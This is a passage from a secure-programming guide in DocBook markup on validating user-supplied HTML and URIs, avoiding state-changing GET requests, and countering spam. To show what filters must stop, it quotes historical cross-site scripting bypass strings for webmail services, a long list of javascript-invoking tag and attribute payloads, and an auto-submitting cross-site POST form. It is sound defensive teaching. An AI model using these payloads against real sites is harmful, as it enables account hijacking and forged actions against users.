||
<sect2 id="encoding-html-tags">
|
||
<title>Encoding HTML Data</title>
|
||
|
||
<para>
|
||
An alternative that is nearly as safe
|
||
is to transform the critical characters so they won't
|
||
have their usual meaning in HTML.
|
||
This can be done by translating all "<" into "&lt;",
|
||
">" into "&gt;", and "&" into "&amp;".
|
||
Arbitrary international characters can be encoded in Latin-1
|
||
using the format "&#value;" - do not forget the ending semicolon.
|
||
Encoding the international characters means you must know what the
|
||
input encoding was, of course.
|
||
</para>
|
||
|
||
<para>
|
||
One possible danger here is that if these encodings are accidentally
|
||
interpreted twice, they will become a vulnerability.
|
||
However, this approach at least permits later users to see the
|
||
"intent" of the input.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="Validating-html-tags">
|
||
<title>Validating HTML Data</title>
|
||
|
||
<para>
|
||
Some applications, to work at all, must accept HTML from third parties
|
||
and send them on to their users.
|
||
Beware - you are treading dangerous ground at this point; be sure
|
||
that you really want to do this.
|
||
Even the idea of accepting HTML from arbitrary places
|
||
is controversial among some security practitioners, because it is extremely
|
||
difficult to get it right.
|
||
</para>
|
||
|
||
<para>
|
||
However, if your application must accept HTML, and you believe
|
||
that it's worth the risk, at least identify a list
|
||
of ``safe'' HTML commands and only permit those commands.
|
||
</para>
|
||
|
||
<para>
|
||
Here is a minimal set of safe HTML tags
|
||
that might be useful for applications (such as guestbooks)
|
||
that support short comments:
|
||
<p> (paragraph),
|
||
<b> (bold),
|
||
<i> (italics),
|
||
<em> (emphasis),
|
||
<strong> (strong emphasis),
|
||
<pre> (preformatted text),
|
||
<br> (forced line break - note it doesn't require a closing tag),
|
||
as well as all their ending tags.
|
||
</para>
|
||
|
||
<para>
|
||
Not only do you need to ensure that only a small set
|
||
of ``safe'' HTML commands are accepted, you also need to ensure
|
||
that they are properly nested and closed
|
||
(i.e., that the HTML commands are ``balanced'').
|
||
In XML, this is termed ``well-formed'' data.
|
||
A few exceptions could be made if you're accepting standard HTML
|
||
(e.g., supporting an implied </p> where not provided before a
|
||
<p> would be fine), but trying to accept HTML in its full
|
||
generality (which can infer balancing closing tags in many cases)
|
||
is not needed for most applications.
|
||
Indeed, if you're trying to stick to XHTML (instead of HTML), then
|
||
well-formedness is a requirement.
|
||
Also, HTML tags are case-insensitive; tags can be upper case,
|
||
lower case, or a mixture.
|
||
However, if you intend to accept XHTML
|
||
then you need to require all tags to be in lower case
|
||
(XML is case-sensitive; XHTML uses XML and requires the tags to be
|
||
in lower case).
|
||
</para>
|
||
|
||
<para>
|
||
Here are a few random tips about doing this.
|
||
Usually you should design whatever surrounds the HTML text and the
|
||
set of permitted tags so that the contributed text cannot be misinterpreted
|
||
as text from the ``main'' site (to prevent forgeries).
|
||
Don't accept any attributes unless you've checked the attribute type and
|
||
its value; there are many attributes that support things such as
|
||
Javascript that can cause trouble for your users.
|
||
You'll notice that in the above list I didn't include any attributes at all,
|
||
which is certainly the safest course.
|
||
You should probably give a warning message if an unsafe tag is used,
|
||
but if that's not practical, encoding the critical characters
|
||
(e.g., "<" becomes "&lt;") prevents data loss while
|
||
simultaneously keeping the users safe.
|
||
</para>
|
||
|
||
<para>
|
||
Be careful when expanding this set, and in general be restrictive of
|
||
what you accept.
|
||
If your patterns are too generous, the browser may interpret the
|
||
sequences differently than you expect, resulting in a potential
|
||
exploit.
|
||
For example, FozZy posted on Bugtraq (1 April 2002)
|
||
some sequences that permitted
|
||
exploitation in various web-based mail systems,
|
||
which may give you an idea of the kinds of problems you need to defend
|
||
against.
|
||
Here's some exploit text that, at one time, could
|
||
subvert user accounts in Microsoft Hotmail:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<SCRIPT>
|
||
</COMMENT>
|
||
<!-- --> -->
|
||
]]>
|
||
</programlisting>
|
||
Here's some similar exploit text for Yahoo! Mail:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<_a<script>
|
||
<<script> (Note: this was found by BugSan)
|
||
]]>
|
||
</programlisting>
|
||
Here's some exploit text for Vizzavi:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<b onmousover="...">go here</b>
|
||
<img [line_break] src="javascript:alert(document.location)">
|
||
]]>
|
||
</programlisting>
|
||
|
||
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various
|
||
text that invokes Javascript yet manages to bypass many filters.
|
||
Here are his examples (which he says he cut and pasted from elsewhere);
|
||
some only apply to specific browsers
|
||
(IE means Internet Explorer, N4 means Netscape version 4).
|
||
<programlisting>
|
||
<![CDATA[
|
||
<a href="javascript#[code]">
|
||
<div onmouseover="[code]">
|
||
<img src="javascript:[code]">
|
||
<img dynsrc="javascript:[code]"> [IE]
|
||
<input type="image" dynsrc="javascript:[code]"> [IE]
|
||
<bgsound src="javascript:[code]"> [IE]
|
||
&<script>[code]</script>
|
||
&{[code]}; [N4]
|
||
<img src=&{[code]};> [N4]
|
||
<link rel="stylesheet" href="javascript:[code]">
|
||
<iframe src="vbscript:[code]"> [IE]
|
||
<img src="mocha:[code]"> [N4]
|
||
<img src="livescript:[code]"> [N4]
|
||
<a href="about:<script>[code]</script>">
|
||
<meta http-equiv="refresh" content="0;url=javascript:[code]">
|
||
<body onload="[code]">
|
||
<div style="background-image: url(javascript:[code]);">
|
||
<div style="behaviour: url([link to code]);"> [IE]
|
||
<div style="binding: url([link to code]);"> [Mozilla]
|
||
<div style="width: expression([code]);"> [IE]
|
||
<style type="text/javascript">[code]</style> [N4]
|
||
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
|
||
<style><!--</style><script>[code]//--></script>
|
||
<!-- -- --><script>[code]</script><!-- -- -->
|
||
<<script>[code]</script>
|
||
<img src="blah"onmouseover="[code]">
|
||
<img src="blah>" onmouseover="[code]">
|
||
<xml src="javascript:[code]">
|
||
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
|
||
<div datafld="b" dataformatas="html" datasrc="#X"></div>
|
||
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
|
||
<![CDATA[<!--]] ><script>[code]//--></script>
|
||
|
||
]]>
|
||
<!-- I inserted a space after ]] just above. -->
|
||
</programlisting>
|
||
This is not a complete list, of course, but it at least is a sample
|
||
of the kinds of attacks that you must prevent by strictly limiting the
|
||
tags and attributes you can allow from untrusted users.
|
||
</para>
|
||
<para>
|
||
Konstantin Riabitsev has posted
|
||
<ulink url="http://www.mricon.com/html/phpfilter.html">
|
||
some PHP code to filter HTML</ulink> (GPL);
|
||
I've not examined it closely, but you might want to take a look.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="Validating-uris">
|
||
<title>Validating Hypertext Links (URIs/URLs)</title>
|
||
|
||
<para>
|
||
Careful readers will notice that I did not include the hypertext link tag
|
||
<a> as a safe tag in HTML.
|
||
Clearly, you could add
|
||
<a href="safe URI"> (hypertext link) to the safe list
|
||
(not permitting any other attributes unless you've checked their
|
||
contents).
|
||
If your application requires it, then do so.
|
||
However, permitting third parties to create links
|
||
is much less safe, because defining a ``safe URI''<footnote>
|
||
<para>
|
||
Technically, a hypertext link can be any ``uniform resource
|
||
identifier'' (URI).
|
||
The term "Uniform Resource Locator" (URL) refers to the subset of URIs
|
||
that identify resources via a representation of their primary access
|
||
mechanism (e.g., their network "location"), rather than identifying
|
||
the resource by name or by some other attribute(s) of that resource.
|
||
Many people use the term ``URL'' as synonymous with ``URI'', since URLs
|
||
are the most common kind of URI.
|
||
For example, the encoding used in URIs is actually called ``URL encoding''.
|
||
</para>
|
||
</footnote>
|
||
turns out to be very difficult.
|
||
Many browsers accept
|
||
all sorts of URIs which may be dangerous to the user.
|
||
This section discusses how to validate URIs from third parties for
|
||
re-presenting to others, including URIs incorporated into HTML.
|
||
</para>
|
||
|
||
<para>
|
||
First, let's look briefly at URI syntax (as defined by various specifications).
|
||
URIs can be either ``absolute'' or ``relative''.
|
||
The syntax of an absolute URI looks like this:
|
||
<programlisting>
|
||
scheme://authority[path][?query][#fragment]
|
||
</programlisting>
|
||
A URI starts with a scheme name (such as ``http''), the characters ``://'',
|
||
the authority (such as ``www.dwheeler.com''), a path
|
||
(which looks like a directory or file name), a question mark followed by
|
||
a query, and a hash (``#'') followed by a fragment identifier.
|
||
The square brackets surround optional portions - e.g., many URIs don't
|
||
actually include the query or fragment.
|
||
Some schemes may not permit some of the data (e.g., paths, queries, or
|
||
fragments), and many schemes have additional requirements unique to them.
|
||
Many schemes permit the ``authority'' field to identify
|
||
optional usernames, passwords, and ports, using this syntax for the
|
||
``authority'' section:
|
||
<programlisting>
|
||
[username[:password]@]host[:portnumber]
|
||
</programlisting>
|
||
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4
|
||
numeric address (127.0.0.1).
|
||
A ``relative'' URI references one object relative to the ``current'' one,
|
||
and its syntax looks a lot like a filename:
|
||
<programlisting>
|
||
path[?query][#fragment]
|
||
</programlisting>
|
||
There are a limited number of characters permitted in most of the URI,
|
||
so to get around this problem, other 8-bit characters may be ``URL encoded''
|
||
as %hh (where hh is the hexadecimal value of the 8-bit character).
|
||
For more detailed information on valid URIs, see IETF RFC 2396 and its
|
||
related specifications.
|
||
</para>
|
||
|
||
<para>
|
||
Now that we've looked at the syntax of URIs, let's examine the risks
|
||
of each part:
|
||
<itemizedlist>
|
||
<listitem><para>Scheme:
|
||
Many schemes are downright dangerous.
|
||
Permitting someone to insert a ``javascript'' scheme into your material
|
||
would allow them to trivially mount denial-of-service attacks
|
||
(e.g., by repeatedly creating windows so the user's machine freezes or
|
||
becomes unusable).
|
||
More seriously, they might be able to exploit a known vulnerability in
|
||
the javascript implementation.
|
||
Some schemes can be a nuisance, such as ``mailto:'' when a mailing
|
||
is not expected, and some schemes may not be sufficiently secure
|
||
on the client machine.
|
||
Thus, it's necessary to limit the set of allowed schemes to
|
||
just a few safe schemes.
|
||
</para></listitem>
|
||
<listitem><para>Authority:
|
||
Ideally, you should limit user links to ``safe'' sites, but this is
|
||
difficult to do in practice.
|
||
However, you can certainly do something about usernames, passwords,
|
||
and port numbers: you should forbid them.
|
||
Systems expecting usernames (especially with passwords!) are probably
|
||
guarding more important material;
|
||
rarely is this needed in publicly-posted URIs, and someone could try
|
||
to use this functionality to convince users
|
||
to expose information they have access to and/or
|
||
use it to modify the information.
|
||
Such URIs permit semantic attacks; see
|
||
<xref linkend="semantic-attacks">
|
||
for more information.
|
||
Usernames without passwords are no less dangerous, since browsers typically
|
||
cache the passwords.
|
||
You should not usually permit specification of ports, because
|
||
different ports expect different protocols and the resulting
|
||
``protocol confusion'' can produce an exploit.
|
||
For example, on some systems it's possible to use the ``gopher'' scheme
|
||
and specify the SMTP (email) port to cause a user to send email of the
|
||
attacker's choosing.
|
||
You might permit a few special cases (e.g., http ports 8008 and 8080),
|
||
but on the whole it's not worth it.
|
||
The host when specified by name actually has a fairly limited character set
|
||
(using the DNS standards).
|
||
Technically, the standard doesn't permit the underscore (``_'') character,
|
||
but Microsoft ignored this part of the standard and even requires the
|
||
use of the underscore in some circumstances, so you probably should allow it.
|
||
Also, there's been a great deal of work on supporting international
|
||
characters in DNS names, which is not further discussed here.
|
||
</para></listitem>
|
||
<listitem><para>Path:
|
||
Permitting a path is usually okay, but unfortunately some applications
|
||
use part of the path as query data, creating an opening we'll discuss next.
|
||
Also, paths are allowed to contain phrases like ``..'', which can expose
|
||
private data in a poorly-written web server;
|
||
this is less a problem than it once was and really should be fixed
|
||
by the web server.
|
||
Since it's only the phrase ``..'' that's special, it's reasonable to
|
||
look at paths (and possibly query data) and forbid ``../'' as a content.
|
||
However, if your validator permits URL escapes, this can be difficult;
|
||
now you need to prevent versions where some of these characters are
|
||
escaped, and may also have to deal with various ``illegal'' character
|
||
encodings of these characters as well.
|
||
</para></listitem>
|
||
<listitem><para>Query:
|
||
Query formats (beginning with "?") can be a security risk
|
||
because some query formats actually cause actions to occur on the serving end.
|
||
They shouldn't, and your applications shouldn't, as discussed in
|
||
<xref linkend="avoid-get-non-queries"> for more information.
|
||
However, we have to acknowledge the reality as a serious problem.
|
||
In addition, many web sites are actually ``redirectors'' - they take a
|
||
parameter specifying where the user should be redirected, and send back
|
||
a command redirecting the user to the new location.
|
||
If an attacker references such sites and provides
|
||
a more dangerous URI as the redirection value, and the
|
||
browser blithely obeys the redirection, this could be a problem.
|
||
Again, the user's browser should be more careful, but not all user
|
||
browsers are sufficiently cautious.
|
||
Also, many web applications have vulnerabilities that can be
|
||
exploited with certain query values, but in general this is hard to
|
||
prevent.
|
||
The official URI specifications don't sanction the ``+'' (plus) character,
|
||
but in practice the ``+'' character often represents the space character.
|
||
</para></listitem>
|
||
<listitem><para>Fragment:
|
||
Fragments basically locate a portion of a document; I'm unaware of
|
||
an attack based on fragments as long as the syntax is legal, but the
|
||
legality of its syntax does need checking.
|
||
Otherwise, an attacker might be able to insert a character such as the
|
||
double-quote (") and prematurely end the URI (foiling any checking).
|
||
</para></listitem>
|
||
<listitem><para>URL escapes:
|
||
URL escapes are useful because they can represent arbitrary 8-bit
|
||
characters; they can also be very dangerous for the same reasons.
|
||
In particular, URL escapes can represent control characters, which many
|
||
poorly-written web applications are vulnerable to.
|
||
In fact, with or without URL escapes, many web applications are vulnerable
|
||
to certain characters (such as backslash, ampersand, etc.), but again
|
||
this is difficult to generalize.
|
||
</para></listitem>
|
||
<listitem><para>Relative URIs:
|
||
Relative URIs should be reasonably safe (if you manage the web site well),
|
||
although in some applications there's no good reason to allow them either.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Of course, there is a trade-off with simplicity as well.
|
||
Simple patterns are easier to understand, but
|
||
they aren't very refined (so they tend to be too permissive or
|
||
too restrictive, even more than a refined pattern).
|
||
Complex patterns can be more exact, but they are more likely to have
|
||
errors, require more performance to use, and can be hard to
|
||
implement in some circumstances.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Here's my suggestion for a ``simple mostly safe'' URI pattern which is
|
||
very simple and can be implemented ``by hand'' or through a regular
|
||
expression; permit the following pattern:
|
||
<programlisting width="79">
|
||
(http|ftp|https)://[-A-Za-z0-9._/]+
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
This pattern doesn't permit many potentially dangerous capabilities
|
||
such as queries, fragments, ports, or relative URIs,
|
||
and it only permits a few schemes.
|
||
It prevents the use of the ``%'' character, which is used in URL escapes
|
||
and can be used to specify characters that the server may not be
|
||
prepared to handle.
|
||
Since it doesn't permit either ``:'' or URL escapes, it doesn't permit
|
||
specifying port numbers, and even using it to redirect to a
|
||
more dangerous URI would be difficult (due to the lack of the escape character).
|
||
It also prevents the use of a number of other characters; again, many
|
||
poorly-designed web applications can't handle a number of
|
||
``unexpected'' characters.
|
||
</para>
|
||
|
||
<para>
|
||
Even this ``mostly safe'' URI permits
|
||
a number of questionable URIs, such as
|
||
subdirectories (via ``/'') and attempts to move up directories (via `..'');
|
||
illegal queries of this kind should be caught by the server.
|
||
It permits some illegal host identifiers (e.g., ``20.20''),
|
||
though I know of no case where this would be a security weakness.
|
||
Some web applications treat subdirectories as query data (or worse,
|
||
as command data); this is hard to prevent in general since finding
|
||
``all poorly designed web applications'' is hopeless.
|
||
You could prevent the use of all paths, but this would make it
|
||
impossible to reference most Internet information.
|
||
The pattern also allows references to local server information
|
||
(through patterns such as "http:///", "http://localhost/", and
|
||
"http://127.0.0.1") and access to servers on an internal network;
|
||
here you'll have to depend on the servers correctly interpreting the
|
||
resulting HTTP GET request as solely a request for information and not
|
||
a request for an action,
|
||
as recommended in <xref linkend="avoid-get-non-queries">.
|
||
Since query forms aren't permitted by this pattern, in many environments
|
||
this should be sufficient.
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, the ``mostly safe''
|
||
pattern also prevents a number of quite legitimate and useful URIs.
|
||
For example,
|
||
many web sites use the ``?'' character to identify specific documents
|
||
(e.g., articles on a news site).
|
||
The ``#'' character is useful for specifying specific sections of a document,
|
||
and permitting relative URIs can be handy in a discussion.
|
||
Various permitted characters and URL escapes aren't included in the
|
||
``mostly safe'' pattern.
|
||
For example, without permitting URL escapes, it's difficult to access
|
||
many non-English pages.
|
||
If you truly need such functionality, then you can use less safe patterns,
|
||
realizing that you're exposing your users to higher risk while
|
||
giving your users greater functionality.
|
||
</para>
|
||
|
||
<para>
|
||
One pattern that permits queries, but at
|
||
least limits the protocols and ports used is the following,
|
||
which I'll call the ``simple somewhat safe pattern'':
|
||
<programlisting width="79">
|
||
(http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
|
||
</programlisting>
|
||
This pattern actually isn't very smart, since it permits illegal escapes,
|
||
multiple queries, queries in ftp, and so on.
|
||
It does have the advantage of being relatively simple.
|
||
</para>
|
||
|
||
<para>
|
||
Creating a ``somewhat safe'' pattern that really limits URIs
|
||
to legal values is quite difficult.
|
||
Here's my current attempt to do so, which I call
|
||
the ``sophisticated somewhat safe pattern'', expressed in a form
|
||
where whitespace is ignored and comments are introduced with "#":
|
||
<!-- Warning! If you are cutting and pasting this pattern, make sure that
|
||
the "&" is turned back into an ampersand, and that the whitespace
|
||
is removed before use or ignored during use. -->
|
||
|
||
<programlisting width="79">
|
||
(
|
||
(
|
||
# Handle http, https, and relative URIs:
|
||
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\?( # query:
|
||
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
|
||
(\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
|
||
|
|
||
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
|
||
)
|
||
))?
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)|
|
||
# Handle ftp:
|
||
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)
|
||
)
|
||
</programlisting>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
|
||
For example, again, "20.20" isn't a legal domain name, but it's allowed
|
||
by the pattern; however, to my knowledge
|
||
this shouldn't cause any security problems.
|
||
The sophisticated pattern forbids URL escapes that represent
|
||
control characters (e.g., %00 through $1F) -
|
||
the smallest permitted escape value is %20 (ASCII space).
|
||
Forbidding control characters prevents some trouble, but it's
|
||
also limiting; change "2-9" to "0-9" everywhere if you need to support sending
|
||
all control characters to arbitrary web applications.
|
||
This pattern does permit all other URL escape values in paths,
|
||
which is useful for international characters but could cause trouble
|
||
for a few systems which can't handle it.
|
||
The pattern at least prevents spaces, linefeeds,
|
||
double-quotes, and other dangerous characters
|
||
from being in the URI, which prevents other kinds of
|
||
attacks when incorporating the URI into a generated document.
|
||
Note that the pattern permits ``+'' in many places, since in practice
|
||
the plus is often used to replace the space character
|
||
in queries and fragments.
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, as noted above,
|
||
there are attacks which can work through any technique that permit query data,
|
||
and there don't seem to be really good defenses for them once you
|
||
permit queries.
|
||
So, you could strip out the ability to use query data from the
|
||
pattern above, but permit the other forms, producing a
|
||
``sophisticated mostly safe'' pattern:
|
||
<programlisting width="79">
|
||
(
|
||
(
|
||
# Handle http, https, and relative URIs:
|
||
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
|
||
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)|
|
||
# Handle ftp:
|
||
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
|
||
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
|
||
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
|
||
)
|
||
)
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
As far as I can tell, as long as these patterns are only used to check
|
||
hypertext anchors selected by the user (the "<a>" tag)
|
||
this approach also prevents the insertion of ``web bugs''.
|
||
Web bugs are simply text that allow someone other
|
||
than the originating web server
|
||
of the main page to track information such as who read
|
||
the content and when they read it -
|
||
see <xref linkend="embedded-content-bugs"> for more information.
|
||
This isn't true if you use the <img> (image) tag with the same
|
||
checking rules - the image tag is loaded immediately, permitting
|
||
someone to add a ``web bug''.
|
||
Once again, this presumes that you're not permitting any attributes;
|
||
many attributes can be quite dangerous and pierce the security you're
|
||
trying to provide.
|
||
</para>
|
||
|
||
<para>
|
||
Please note that all of these patterns require the entire URI match
|
||
the pattern.
|
||
An unfortunate fact of these patterns is that they limit the
|
||
allowable patterns in a way that forbids many useful ones
|
||
(e.g., they prevent the use of new URI schemes).
|
||
Also, none of them can prevent the very real problem that some web sites
|
||
perform more than queries when presented with a query - and some of these
|
||
web sites are internal to an organization.
|
||
As a result, no URI can really be safe until there
|
||
are no web sites that accept GET queries as an action
|
||
(see <xref linkend="avoid-get-non-queries">).
|
||
For more information about legal URLs/URIs, see IETF RFC 2396;
|
||
domain name syntax is further discussed in IETF RFC 1034.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="other-html-tags">
|
||
<title>Other HTML tags</title>
|
||
|
||
<para>
|
||
You might even consider supporting more HTML tags.
|
||
Obvious next choices are the list-oriented tags, such as
|
||
<ol> (ordered list),
|
||
<ul> (unordered list),
|
||
and <li> (list item).
|
||
However, after a certain point you're really permitting
|
||
full publishing (in which case you need to trust the provider or perform more
|
||
serious checking than will be described here).
|
||
Even more importantly, every new functionality you add creates an
|
||
opportunity for error (and exploit).
|
||
</para>
|
||
|
||
<para>
|
||
One example would be permitting the
|
||
<img> (image) tag with the same URI pattern.
|
||
It turns out this is substantially less safe, because this
|
||
permits third parties to insert ``web bugs'' into the document,
|
||
identifying who read the document and when.
|
||
See <xref linkend="embedded-content-bugs"> for more information on web bugs.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="related-issues">
|
||
<title>Related Issues</title>
|
||
|
||
<para>
|
||
Web applications should also explicitly specify the character set
|
||
(usually ISO-8859-1), and not permit other characters, if data from
|
||
untrusted users is being used.
|
||
See <xref linkend="output-character-encoding"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
Since filtering this kind of input is easy to get wrong, other
|
||
alternatives have been discussed as well.
|
||
One option is to ask users to use a different language, much simpler
|
||
than HTML, that you've designed - and you give that language very limited
|
||
functionality.
|
||
Another approach is parsing the HTML into some internal ``safe'' format,
|
||
and then translating that safe format back to HTML.
|
||
</para>
|
||
|
||
<para>
|
||
Filtering can be done during input, output, or both.
|
||
The CERT recommends filtering data during the output process,
|
||
just before it is rendered as part of the dynamic page.
|
||
This is because, if it is done correctly,
|
||
this approach ensures that all dynamic content is filtered.
|
||
The CERT believes that filtering on the input side is less effective
|
||
because dynamic content can be entered into a web sites database(s) via
|
||
methods other than HTTP, and in this case,
|
||
the web server may never see the data as part of the input process.
|
||
Unless the filtering is implemented in all places where dynamic data
|
||
is entered, the data elements may still be remain tainted.
|
||
</para>
|
||
|
||
<para>
|
||
However, I don't agree with CERT on this point for all cases.
|
||
The problem is that it's just as easy to forget to filter all the output
|
||
as the input, and allowing ``tainted'' input into your system
|
||
is a disaster waiting to happen anyway.
|
||
A secure program has to filter its inputs anyway, so it's sometimes better
|
||
to include all of these checks as part of the input filtering
|
||
(so that maintainers can see what the rules really are).
|
||
And finally, in some secure programs there are many different program
|
||
locations that may output a value, but only a very few ways and locations
|
||
where a data can be input into it;
|
||
in such cases filtering on input may be a better idea.
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-get-non-queries">
|
||
<title>Forbid HTTP GET To Perform Non-Queries</title>
|
||
<para>
|
||
Web-based applications using HTTP should prevent the use of
|
||
the HTTP ``GET'' or ``HEAD'' method for anything other than queries.
|
||
HTTP includes a number of different methods; the two most popular methods
|
||
used are GET and POST.
|
||
Both GET and POST can be used to transmit data from a form, but the
|
||
GET method transmits data in the URL, while the POST method
|
||
transmits data separately.
|
||
</para>
|
||
|
||
<para>
|
||
The security problem of using GET to perform non-queries
|
||
(such as changing data, transferring money, or signing up for a service)
|
||
is that an attacker can create a hypertext link
|
||
with a URL that includes malicious form data.
|
||
If the attacker convinces a victim to click on the link
|
||
(in the case of a hypertext link),
|
||
or even just view a page (in the case of transcluded information
|
||
such as images from HTML's img tag), the victim
|
||
will perform a GET.
|
||
When the GET is performed,
|
||
all of the form data created by the attacker will be sent by the victim
|
||
to the link specified.
|
||
This is a cross-site malicious content attack, as discussed further in
|
||
<xref linkend="cross-site-malicious-content">.
|
||
</para>
|
||
|
||
<para>
|
||
If the only action that a malicious cross-site content attack can perform is
|
||
to make the user view unexpected data, this isn't as serious a problem.
|
||
This can still be a problem, of course, since there are some attacks
|
||
that can be made using this capability.
|
||
For example, there's a
|
||
potential loss of privacy due to the user requesting something unexpected,
|
||
possible real-world effects from appearing to request illegal or
|
||
incriminating material, or by making the user request the information
|
||
in certain ways the information may be exposed to an attacker
|
||
in ways it normally wouldn't be exposed.
|
||
However, even more serious effects can be caused if the malicious attacker
|
||
can cause not just data viewing, but changes in data, through
|
||
a cross-site link.
|
||
</para>
|
||
|
||
<para>
|
||
Typical HTTP interfaces (such as most CGI libraries) normally hide the
|
||
differences between GET and POST, since for getting data it's useful
|
||
to treat the methods ``the same way.''
|
||
However, for actions that actually cause something other than a data query,
|
||
check to see if the request is something other than POST;
|
||
if it is, simply display a filled-in form with the data given and ask
|
||
the user to confirm that they really mean the request.
|
||
This will prevent cross-site malicious content attacks, while still
|
||
giving users the convenience of confirming the action with
|
||
a single click.
|
||
</para>
|
||
|
||
<para>
|
||
Indeed, this behavior is strongly recommended by the HTTP specification.
|
||
According to the HTTP 1.1 specification (IETF RFC 2616 section 9.1.1),
|
||
``the GET and HEAD methods SHOULD NOT have the significance of
|
||
taking an action other than retrieval.
|
||
These methods ought to be considered "safe".
|
||
This allows user agents to represent other methods,
|
||
such as POST, PUT and DELETE, in a special way,
|
||
so that the user is made aware of the fact that a possibly
|
||
unsafe action is being requested.''
|
||
</para>
|
||
|
||
<para>
|
||
In the interest of fairness, I should note that this doesn't
|
||
completely solve the problem, because on some browsers
|
||
(in some configurations) scripted posts can do the same thing.
|
||
For example, imagine a web browser with ECMAscript (Javascript) enabled
|
||
receiving the following HTML snippet - on some browsers, simply
|
||
displaying this HTML snippet will
|
||
automatically force the user to send a POST request to a website
|
||
chosen by the attacker, with form data defined by the attacker:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<form action=http://remote/script.cgi method=post name=b>
|
||
<input type=hidden name=action value="do something">
|
||
<input type=submit>
|
||
</form>
|
||
<script>document.b.submit()</script>
|
||
]]>
|
||
</programlisting>
|
||
My thanks to David deVitry pointing this out.
|
||
However, although this advice doesn't solve all problems, it's
|
||
still worth doing.
|
||
In part, this is because the remaining problem
|
||
can be solved by smarter web browsers
|
||
(e.g., by always confirming the data before
|
||
allowing ECMAscript to send a web form) or
|
||
by web browser configuration (e.g., disabling ECMAscript).
|
||
Also, this attack doesn't work in many cross-site scripting exploits, because
|
||
many websites don't allow users to post ``script'' commands but do
|
||
allow arbitrary URL links.
|
||
Thus, limiting the actions a GET command can perform to queries
|
||
significantly improves web application security.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="counter-spam">
|
||
<title>Counter SPAM</title>
|
||
<para>
|
||
Any program that can send email elsewhere, by request from the network,
|
||
can be used to transport spam.
|
||
Spam is the usual name for unsolicited bulk email (UBE) or
|
||
mass unsolicited email.
|
||
It's also sometimes called unsolicited commercial email (UCE), though
|
||
that name is misleading - not all spam is commercial.
|
||
For a discussion of why spam is such a serious problem and more general
|
||
discussion about it,
|
||
see my essay at
|
||
<ulink url="http://www.dwheeler.com/essays/stopspam.html">http://www.dwheeler.com/essays/stopspam.html</ulink>, as well as
|
||
<ulink url="http://mail-abuse.org/">http://mail-abuse.org/</ulink>,
|
||
<ulink url="http://spam.abuse.net/">http://spam.abuse.net/</ulink>,
|
||
<ulink url="http://http://www.cauce.org/">CAUCE</ulink>, and
|
||
<ulink url="http://www.faqs.org/rfcs/rfc2635.html">IETF RFC 2635</ulink>.
|
||
